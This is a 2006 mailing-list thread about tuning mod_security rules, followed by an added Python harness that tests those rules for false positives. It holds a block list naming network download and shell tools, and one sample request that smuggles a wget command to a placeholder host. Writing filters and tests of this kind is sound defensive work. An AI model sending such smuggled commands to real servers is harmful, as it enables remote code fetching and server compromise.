It's not my intention to block user agents. It's my intention to block
the common attacks sent through as parameters. Please read the entire
post next time instead of paying attention to a single word. I made no
mention of blocking user agents as a client. I mentioned blocking the
use of lynx in the request as an attack without barring access to
pages that might conflict with the filter. In my opinion, blocking
access based on user agents is overdoing it. You could block access
to a legitimate web spider. I wouldn't use it unless I found that some
commercial site scraper didn't allow the user agent to be changed
(which is 99% of the software out there anyways.)
Jamie
On 3/6/06, Linh Vu <vu...@ph...> wrote:
> You should be more specific with your filter rules. Use HTTP_USER_AGENT
> to block user agents instead of the very generic THE_REQUEST.
>
> Linh
>
> Jamie Krasnoo wrote:
>
> >I was going through the audit logs this morning and found that a page
> >of a customer of mine was being blocked by mod_sec for no good reason
> >other than the fact that the parameters contained lynx (Ottawa-Lynx to
> >be exact). I doubt that there would be any other conflicts with linux
> >programs when it comes to sports teams. As you can see I modified the
> >rule for lynx to make sure it doesn't match a "-" in front of it. Am I
> >opening up my server to an attack if someone does something clever? How
> >would I make sure something doesn't get rejected if nothing malicious
> >was intended?
> >
> >Thanks,
> >
> >Jamie
> >
> >------------------------------------------------------------------------
> >
> > # Block various methods of downloading files to a server
> > SecFilterSelective THE_REQUEST "wget "
> > SecFilterSelective THE_REQUEST "[^-]lynx "
> > SecFilterSelective THE_REQUEST "scp "
> > SecFilterSelective THE_REQUEST "ftp "
> > SecFilterSelective THE_REQUEST "cvs "
> > SecFilterSelective THE_REQUEST "rcp "
> > SecFilterSelective THE_REQUEST "curl "
> > SecFilterSelective THE_REQUEST "telnet "
> > SecFilterSelective THE_REQUEST "ssh "
> > SecFilterSelective THE_REQUEST "echo "
> > SecFilterSelective THE_REQUEST "links -dump "
> > SecFilterSelective THE_REQUEST "links -dump-charset "
> > SecFilterSelective THE_REQUEST "links -dump-width "
> > SecFilterSelective THE_REQUEST "links http:// "
> > SecFilterSelective THE_REQUEST "links ftp:// "
> > SecFilterSelective THE_REQUEST "links -source "
> > SecFilterSelective THE_REQUEST "mkdir "
> > SecFilterSelective THE_REQUEST "cd /tmp "
> > SecFilterSelective THE_REQUEST "cd /var/tmp "
> > SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
> >
> >
>
>
> --
> -----------------------------------------------
> Linh Vu - Web/DB and Systems Support officer
> School of Physics, The University of Melbourne
> Office: 8344 8093 Email: vu...@ph...
> -----------------------------------------------
>
>
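Added example, not part of the original thread: a small regression harness that runs a subset of the quoted filters over constructed, already URL-decoded request lines to surface false positives before a rule change is deployed. The sample requests, the pre-change form of the lynx rule, and the use of Python's `re` with case-insensitive matching in place of the module's own regex engine are assumptions.

```python
import re

# Subset of the filters quoted above. ORIGINAL_LYNX is the rule as it is
# assumed to have read before the "[^-]" change (same form as the others).
ORIGINAL_LYNX = "lynx "
RULES = ["wget ", "[^-]lynx ", "curl ", "echo ", "ssh "]

# Constructed request lines, already URL-decoded (assumption), each paired
# with whether the site owner wants the request blocked.
SAMPLES = [
    ("GET /roster.php?team=Ottawa-Lynx HTTP/1.1", False),
    ("GET /search.php?q=Ottawa Lynx HTTP/1.1", False),
    ("GET /forum.php?msg=please echo my thanks HTTP/1.1", False),
    ("GET /news.php?id=42 HTTP/1.1", False),
    ("GET /page.php?inc=x;wget http://example.invalid/a HTTP/1.1", True),
]


def matching_rules(request_line, rules):
    """Return the patterns that hit; case-insensitive matching is assumed."""
    return [p for p in rules if re.search(p, request_line, re.IGNORECASE)]


def audit(samples, rules):
    """Classify each sample as ok, false positive or missed."""
    report = []
    for line, should_block in samples:
        hits = matching_rules(line, rules)
        if hits and not should_block:
            verdict = "false positive"
        elif not hits and should_block:
            verdict = "missed"
        else:
            verdict = "ok"
        report.append((line, verdict, hits))
    return report


if __name__ == "__main__":
    for line, verdict, hits in audit(SAMPLES, RULES):
        print(f"{verdict:15} {hits!s:20} {line}")
```

On these samples the "[^-]" change clears the Ottawa-Lynx page, while a team name written with a space and an ordinary sentence containing "echo " are still rejected, because the filters match the whole request line rather than a command context.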